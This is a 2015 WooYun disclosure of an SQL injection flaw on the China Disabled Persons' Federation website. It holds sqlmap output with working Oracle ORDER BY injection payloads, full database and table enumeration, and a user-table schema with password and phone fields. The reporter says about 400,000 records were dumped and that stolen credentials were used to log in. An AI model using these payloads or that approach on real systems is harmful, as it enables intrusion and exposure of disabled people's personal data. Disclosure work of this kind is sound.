当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162998

漏洞标题:中国残疾人联合会信息中心主站存在高危注入漏洞涉及大量用户信息(包括用户名,密码,邮箱,身份证,手机号码,家庭住址等等)

相关厂商:中国残疾人联合会

漏洞作者: 路人甲

提交时间:2015-12-21 00:16

修复时间:2016-02-07 17:56

公开时间:2016-02-07 17:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-25: 厂商已经确认,细节仅向厂商公开
2016-01-04: 细节向核心白帽子及相关领域专家公开
2016-01-14: 细节向普通白帽子公开
2016-01-24: 细节向实习白帽子公开
2016-02-07: 细节向公众公开

简要描述:

中国残疾人联合会信息中心主站存在高危注入漏洞,泄露40W敏感信息(包括用户名,密码,邮箱,身份证,手机号码,家庭住址等等)。。。。。。

详细说明:

扫出来注入点,直接SQLMAP 跑出网站全部数据库,40万条重要信息,其中包括包括用户名,密码,邮箱,身份证,手机号码,家庭住址等等,通过用户名及密码登陆进去 可以看到注册人详细的信息。。。。泄露网站大量重要信息。。。。
注入点:http://**.**.**.**//jjproduct/jjProductSercher.htm?orderstr=update_date%20desc

sqlmap identified the following injection point(s) with a total of 69 HTTP(s) re
quests:
---
Parameter: orderstr (GET)
    Type: boolean-based blind
    Title: Oracle boolean-based blind - ORDER BY, GROUP BY clause
    Payload: orderstr=update_date desc,(SELECT (CASE WHEN (8391=8391) THEN 1 ELS
E CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
    Type: error-based
    Title: Oracle error-based - ORDER BY, GROUP BY clause
    Payload: orderstr=update_date desc,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||C
HR(113)||CHR(106)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (4258=4258)
THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(113)||CHR(107)||CHR(113)|
|CHR(62))) FROM DUAL)
    Type: AND/OR time-based blind
    Title: Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIV
E_MESSAGE)
    Payload: orderstr=update_date desc,(SELECT (CASE WHEN (9556=9556) THEN DBMS_
PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(118)||CHR(74)||CHR(97),5) ELSE 1/(SELECT 0 FR
OM DUAL) END) FROM DUAL)
---
[21:41:57] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
current user:    'CDPSN_PROJECT_J2EE'
current schema (equivalent to database on Oracle):    'CDPSN_PROJECT_J2EE'
available databases [22]:
[*] CDPSN_PROJECT_J2EE
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PROJECT_J2EE
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
database management system users [29]:
[*] ANONYMOUS
[*] BI
[*] CDPSN_PROJECT_J2EE
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PROJECT_J2EE
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: CDPSN_PROJECT_J2EE
[125 tables]
+----------------------------+
| ADDRESS                    |
| ADMIN_CHANNEL_ROLE         |
| ADMIN_LOG                  |
| ADMIN_ROLE                 |
| ADMIN_USER                 |
| ADMIN_USER_ROLE            |
| APPLY2013_FALSE            |
| APPLY2013_TRUE             |
| AREA                       |
| BLIND_MASSAGE_ORG          |
| CDPSN_VIEW_FZQJW_CLASSINFO |
| CDPSN_VIEW_FZQJW_CP        |
| CDPSN_VIEW_FZQJW_CS        |
| CDPSN_VIEW_FZQW_JXS        |
| CHANNEL                    |
| CHANNEL_THUMBNAIL          |
| CHANNEL_TOP_CONFIG         |
| CHARITY_AGENT              |
| CHARITY_USER               |
| CHECK_PROCESS              |
| CHECK_STEP                 |
| COMMENTS                   |
| CONNTENT_TOP_DATA          |
| CONTENT                    |
| CONTENT_ATTACHMENT         |
| CONTENT_CHECK_RECORD       |
| CONTENT_COMMENT            |
| CONTENT_MULTI              |
| CONTENT_TAG                |
| CONTENT_TAG_RELATIONSHIP   |
| DEMAND                     |
| DEMAND_TEMP                |
| DISABLED_FOSTER_ORG        |
| DISABLED_WELFARE_ORG       |
| DISABLE_TYPE               |
| DISTRIBUTION               |
| DONATION                   |
| DONATION_CLASSINFO         |
| DONATION_GOODS             |
| DONATION_RECEIVER          |
| DONATION_REQUEST_GOODS     |
| DONATION_TEMP              |
| DONATION_TRANS             |
| EXAM_JOB_USER              |
| EXAM_RESULT                |
| EXPERT_UPLOAD              |
| FEEDBACK                   |
| GOODS_NEXUS                |
| GOODS_SORT                 |
| JJ_AREA                    |
| JJ_CERTIFICATE             |
| JJ_CYJYWD                  |
| JJ_CYJYZJ                  |
| JJ_CYZDSM                  |
| JJ_ENTERPRISE              |
| JJ_ENTPRISE_ANNOUCE        |
| JJ_EP_CONTACT              |
| JJ_EP_INCOME               |
| JJ_EP_SCENE                |
| JJ_EP_TYPE                 |
| JJ_FOCUS_PICTURE           |
| JJ_FWJG                    |
| JJ_FWJG_AREA               |
| JJ_LEAVE_MESSAGE           |
| JJ_PD_CATEGORY             |
| JJ_PD_CATEGORY_BAK         |
| JJ_PRISE_RANGE             |
| JJ_PRODUCT                 |
| JJ_PRODUCT_KEYWORD         |
| LAW_MESSAGE                |
| LAW_MESSAGE_2              |
| LAW_RESOURCE               |
| LETTER_INBOX               |
| LETTER_OUTBOX              |
| LETTER_OUTBOX_DRAFT        |
| LETTER_TEXT                |
| LINKS                      |
| LINKSEARCH_LOG             |
| LINKS_APPLY                |
| LINKS_CLASSINFO            |
| LINKS_FEEDBACK             |
| LINKS_LOG                  |
| MEMBER_COMPANY             |
| MEMBER_CONFIRM_LOG         |
| MEMBER_ROLE                |
| MEMBER_USER                |
| MEMBER_USER_INFO           |
| MEMBER_USER_ROLE           |
| ORG_CONTACT                |
| ORG_DIRECTORY              |
| ORG_MULTIMEDIA             |
| ORG_PRODUCT                |
| ORG_RESOURCE               |
| PD_CATEGORY                |
| POLLER                     |
| POLLER_OPTION              |
| POLLER_VOTE                |
| PUBLIC_WELFARE_PROJECT     |
| RECORD_LOGIN_LOG           |
| RECORD_MODIFY_LOG          |
| RECORD_REQUEST_LOG         |
| RECORD_SESSION_LOG         |
| RURAL_ASSIST_ORG           |
| SNS_CAREE                  |
| SNS_COMMENT                |
| SNS_FEED                   |
| SNS_FEED_CONFIG            |
| SNS_FEED_TYPE              |
| SNS_FRIEND                 |
| SNS_FRIEND_CLASS           |
| SNS_NOTIFICATION           |
| SNS_SECRET                 |
| SNS_USER                   |
| SNS_VISITOR                |
| STANDARD_DATA              |
| SYS_CODE                   |
| SYS_PARA                   |
| TEMP_PROCESS               |
| USER_TEST                  |
| VIP_PHOTO                  |
| VIP_REPLY                  |
| VIP_RESOURCE               |
| VIP_TRACK                  |
| VOTE2013_FALSE             |
| VOTE2013_TRUE              |
+----------------------------+


2.png


3.png


4.png


23.png


5.png


漏洞证明:

qq 用户名 密码 手机号码 邮箱 等等 敏感信息、。。。。
可以登录进入界面 看到用户详细信息 身份证和手机号码 家庭住址等等。。。。

Database: CDPSN_PROJECT_J2EE
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| SNS_FEED_CONFIG            | 420149  |
| RECORD_LOGIN_LOG           | 171983  |
| MEMBER_USER_ROLE           | 52862   |
| MEMBER_USER                | 52836   |
| SNS_USER                   | 52836   |
| MEMBER_CONFIRM_LOG         | 38357   |
| SNS_SECRET                 | 35296   |
| CONTENT                    | 27863   |
| LINKS_LOG                  | 24637   |
| LAW_MESSAGE                | 22829   |
| CONTENT_MULTI              | 21242   |
| CONTENT_CHECK_RECORD       | 17420   |
| CHARITY_USER               | 15862   |
| MEMBER_USER_INFO           | 14700   |
| SNS_NOTIFICATION           | 13959   |
| ADDRESS                    | 13920   |
| EXAM_RESULT                | 13513   |
| ORG_DIRECTORY              | 8051    |
| LINKSEARCH_LOG             | 7573    |
| SNS_FEED                   | 7514    |
| DONATION_GOODS             | 5611    |
| FEEDBACK                   | 5525    |
| LETTER_TEXT                | 5168    |
| SNS_FRIEND                 | 5123    |
| ADMIN_LOG                  | 5085    |
| LETTER_INBOX               | 4864    |
| LETTER_OUTBOX              | 4687    |
| MEMBER_COMPANY             | 4440    |
| CONTENT_TAG_RELATIONSHIP   | 4010    |
| LINKS                      | 3397    |
| JJ_AREA                    | 2973    |
| SNS_VISITOR                | 2933    |
| JJ_FWJG                    | 2885    |
| JJ_FWJG_AREA               | 2779    |
| JJ_EP_SCENE                | 1827    |
| ORG_MULTIMEDIA             | 1623    |
| DONATION_RECEIVER          | 1586    |
| DONATION_TRANS             | 1586    |
| CHARITY_AGENT              | 1566    |
| RECORD_SESSION_LOG         | 1483    |
| JJ_PRODUCT                 | 1334    |
| POLLER_VOTE                | 1261    |
| ORG_PRODUCT                | 1167    |
| CDPSN_VIEW_FZQJW_CLASSINFO | 1122    |
| PD_CATEGORY                | 1122    |
| CDPSN_VIEW_FZQJW_CP        | 1048    |
| LINKS_CLASSINFO            | 904     |
| JJ_PD_CATEGORY             | 818     |
| JJ_ENTERPRISE              | 663     |
| JJ_EP_CONTACT              | 492     |
| CONNTENT_TOP_DATA          | 486     |
| TEMP_PROCESS               | 485     |
| AREA                       | 434     |
| SNS_COMMENT                | 426     |
| JJ_CERTIFICATE             | 363     |
| ORG_CONTACT                | 361     |
| DONATION_REQUEST_GOODS     | 341     |
| DEMAND                     | 314     |
| ADMIN_USER_ROLE            | 285     |
| APPLY2013_FALSE            | 283     |
| VIP_REPLY                  | 231     |
| VOTE2013_TRUE              | 204     |
| VIP_TRACK                  | 192     |
| LAW_MESSAGE_2              | 186     |
| USER_TEST                  | 184     |
| GOODS_SORT                 | 172     |
| CHANNEL                    | 150     |
| VOTE2013_FALSE             | 135     |
| DISABLED_WELFARE_ORG       | 116     |
| ADMIN_USER                 | 111     |
| DEMAND_TEMP                | 107     |
| JJ_EP_INCOME               | 103     |
| GOODS_NEXUS                | 98      |
| RURAL_ASSIST_ORG           | 96      |
| APPLY2013_TRUE             | 84      |
| VIP_PHOTO                  | 82      |
| BLIND_MASSAGE_ORG          | 75      |
| DISABLED_FOSTER_ORG        | 74      |
| SYS_CODE                   | 68      |
| DONATION                   | 56      |
| JJ_CYJYWD                  | 50      |
| CDPSN_VIEW_FZQJW_CS        | 47      |
| DONATION_TEMP              | 47      |
| POLLER_OPTION              | 47      |
| EXPERT_UPLOAD              | 45      |
| ORG_RESOURCE               | 44      |
| DONATION_CLASSINFO         | 41      |
| CDPSN_VIEW_FZQW_JXS        | 37      |
| CONTENT_TAG                | 36      |
| ADMIN_CHANNEL_ROLE         | 35      |
| JJ_LEAVE_MESSAGE           | 33      |
| LETTER_OUTBOX_DRAFT        | 31      |
| PUBLIC_WELFARE_PROJECT     | 30      |
| CHANNEL_TOP_CONFIG         | 27      |
| EXAM_JOB_USER              | 26      |
| ADMIN_ROLE                 | 21      |
| SNS_FRIEND_CLASS           | 21      |
| CONTENT_ATTACHMENT         | 18      |
| JJ_FOCUS_PICTURE           | 18      |
| LAW_RESOURCE               | 13      |
| JJ_PD_CATEGORY_BAK         | 11      |
| RECORD_REQUEST_LOG         | 11      |
| JJ_CYZDSM                  | 10      |
| POLLER                     | 9       |
| COMMENTS                   | 8       |
| DISTRIBUTION               | 7       |
| DISABLE_TYPE               | 6       |
| MEMBER_ROLE                | 5       |
| CHECK_PROCESS              | 4       |
| CHECK_STEP                 | 4       |
| JJ_EP_TYPE                 | 4       |
| SNS_FEED_TYPE              | 4       |
| JJ_CYJYZJ                  | 1       |
| JJ_ENTPRISE_ANNOUCE        | 1       |
| VIP_RESOURCE               | 1       |
+----------------------------+---------+
Database: CDPSN_PROJECT_J2EE
Table: MEMBER_USER
[31 columns]
+---------------------+----------+
| Column              | Type     |
+---------------------+----------+
| IDENTITY            | NUMBER   |
| AUTH_CODE           | VARCHAR2 |
| CONFIRM_DATE        | DATE     |
| CREATE_DATE         | DATE     |
| DIMINUTIVE          | VARCHAR2 |
| ENABLED             | NUMBER   |
| ENTRANCE            | NUMBER   |
| IDENTIFICATION_TYPE | NUMBER   |
| IS_EMAIL            | NUMBER   |
| IS_LOGINID          | NUMBER   |
| IS_MOBILE           | NUMBER   |
| LAST_LOGINDATE      | DATE     |
| LAST_LOGINIP        | VARCHAR2 |
| LOGIN_ID            | VARCHAR2 |
| LOGIN_TIMES         | NUMBER   |
| MEMBER_ID           | NUMBER   |
| MOBILE              | NUMBER   |
| MOBILE_OPEN_FLG     | VARCHAR2 |
| ONLINE_TIME         | NUMBER   |
| ORIGINAL            | VARCHAR2 |
| PASSWORD            | VARCHAR2 |
| PATTERN             | NUMBER   |
| PHONE_NUMBER        | VARCHAR2 |
| QQ                  | NUMBER   |
| REGISTER_WAY        | NUMBER   |
| RELATIONSHIP        | NUMBER   |
| SAVED_IDENTIFY_TYPE | NUMBER   |
| STATUS              | NUMBER   |
| UPDATE_DATE         | DATE     |
| USER_EMAIL          | VARCHAR2 |
| USER_TYPE           | NUMBER   |
+---------------------+----------+、


7.png


8.png


9.png


10.png


11.png


12.png


13.png


14.png


15.png


修复方案:

修复吧。。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-25 11:01

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无